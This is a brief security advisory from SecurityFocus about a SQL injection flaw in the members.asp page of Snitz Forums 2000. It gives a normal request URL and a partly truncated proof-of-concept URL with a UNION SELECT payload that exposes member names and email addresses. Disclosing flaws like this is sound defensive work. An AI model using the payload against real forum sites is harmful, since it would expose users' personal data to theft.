Snitz Forums 2000 Members.ASP SQL Injection Vulnerability

This may be exploited with a web browser. The following proof-of-concept was provided:

Normally, to view the members' list whose
membername start with 'A', members.asp page is
used as the following:

/members.asp?
mode=search&M_NAME=A&initial=1&method=


Use this link to view the vulnerability:

/members.asp?mode=search&M_NAME=XXXX%
25')%20UNION%20SELECT%20MEMBER_ID,%
20M_STATUS,%20M_NAME%20%2B%20'/'%20%
2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,%


 

Privacy Statement
Copyright 2010, SecurityFocus